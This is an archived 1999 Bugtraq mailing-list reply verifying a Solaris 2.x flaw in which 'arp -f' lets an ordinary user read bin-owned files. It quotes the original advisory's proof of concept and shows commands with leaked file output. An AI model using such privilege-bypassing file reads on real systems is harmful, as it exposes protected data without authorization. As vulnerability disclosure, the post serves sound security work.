[12824] in bugtraq
Re: Solaris 2.x chkperm/arp vulnerabilities
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Thu Dec 2 15:14:49 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Md5: caR72OjfCmLdVm8D8Ifwkw==
Message-Id: <199912011918.OAA11931@disney.Biw.COM>
Date: Wed, 1 Dec 1999 14:18:53 -0500
Reply-To: "Larry W. Cashdollar" <lwcashd@BIW.COM>
From: "Larry W. Cashdollar" <lwcashd@BIW.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Arp bug Verified for my Solaris 5.6 and 5.5.1 Installs.
$ uname -a
SunOS pangea 5.5.1 Generic_103640-26 sun4u sparc SUNW,Ultra-5_10
# uname -a
SunOS vapid 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
#
$ ls -l /etc/bin
-rw-rw---- 1 bin bin 23 Dec 1 13:54 /etc/bin
On both machines I could read bin:bin owned files as a regular joe user with arp
-f.
bash-2.00$ /usr/sbin/arp -f /etc/bin
arp: ze: unknown host
arp: ze: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: ze: unknown host
arp: zeperl: unknown host
arp: bad line: zeperlizinzeliver
As you can see arp will only print until the first white space or newline.
# cat /etc/bin
ze perl iz in ze liver
ze perl iz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
ze perl iz in ze liver
zeperl iz in ze liver
zeperlizinzeliver
zeperl iz in ze liver
ze perl iz in ze liver
Brock wrote:
>
> Greetings,
>
> OVERVIEW
> /usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files.
>
> BACKGROUND
> All my testing was done on Solaris 2.7 and 2.6 SPARC edition.
>
>
> Vuln #2 - arp
>
> Just as the first, you may read any bin owned files:
> bash-2.02$ ls -la /etc/bin
> -rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
> bash-2.02$ cat /etc/bin
> cat: cannot open /etc/bin
> bash-2.02$ /usr/sbin/arp -f /etc/bin
> arp: bad line: seekret1
>
> arp: bad line: seekret2
>
> arp: bad line: seekret3
>
> arp: bad line: seekret4
>
> arp: bad line: seekret5
>
Larry W. Cashdollar R2D2 r00t3d the death star.
http://vapid.dhs.org
